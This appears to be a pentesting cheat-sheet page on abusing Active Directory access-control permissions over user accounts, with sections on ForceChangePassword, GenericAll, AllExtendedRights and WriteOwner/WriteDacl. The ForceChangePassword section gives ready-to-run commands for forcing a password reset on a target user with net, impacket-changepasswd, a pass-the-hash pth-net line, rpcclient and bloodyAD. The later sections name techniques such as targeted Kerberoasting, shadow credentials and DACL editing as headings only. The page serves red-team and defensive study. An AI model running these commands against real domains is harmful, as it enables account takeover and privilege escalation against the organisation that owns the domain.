githubEdit

ACLs/ACEs permissions on User

ForceChangePassword

1) Net (Windows)

net user TARGET_USER PASSWORD /domain (Windows)

2) Net (Linux)

net rpc password TARGET_USER PASSWORD -S DC_FQDN -U domain.local/USER1%'Password@1'

3) Impacket

impacket-changepasswd domain.local/TARGET_USER@DC_IP -newpass Password@1234 -altuser domain.local/USER1 -altpass Password@1 -reset

Impacket’s changepassword can also be used to change current user password, if current password is known.

impacket-changepasswd domain.local/TARGET_USER@DC_IP -newpass ‘Password@987’ -p rpc-samr

4) pth-toolkit (Run Net RPC commands using Pass-the-Hash)

pth-net rpc password "TARGET_USER" -U domain.local/"USER1"%"64FBAE31CC352FC26AF97CBDEF151E03:"BD0F21ED526A885B378895679A412387" -S DC_IP

5) Rpcclient

rpcclient -U domain.local/USER1 DC_IP
rpcclient $> setuserinfo TARGETUSER 23 Password@987

6) BloodyAD

bloodyAD --host "DC_IP" -d "domain.local" -u "USER1" -p "Password@1" set password "TARGET_USER" "Password@987"

7) ldap_shell (Change passwords over LDAP)

8) Powerview

9) Mimikatz

10) Metasploit

GenericAll / GenericWrite

1) Windows net command

Change the password of a user

2) Linux Net RPC - Samba

3) BloodyAD

4) Rpcclient

5) Targeted Kerberoasting (add SPN)

Alternate method: Powerview

1) Enumerate interesting ACLs with powerview

Then:

6) Logon Script (Access)

7) add Key Credentials (Shadow Credentials)

8) Powerview

9) Windows PowerShell

AllExtendedRights

1) Linux Net RPC - Samba

2) BloodyAD

3) Rpcclient

4) Powerview

WriteOwner /WriteDacl

1) impacket-owneredit

Grant Ownership (owneredit), then assign Full Control (dacledit), then perform Kerberoasting or Password Change attacks (ForceChangePassword).

2) impacket-dacledit

Then, you can do targeted Kerberoasting for example

Crack hash

OR you can change the TARGET_USER's password

BloodyAD

3) Powerview

Now, do Kerberoast from a Windows Machine instead

OR change password

Last updated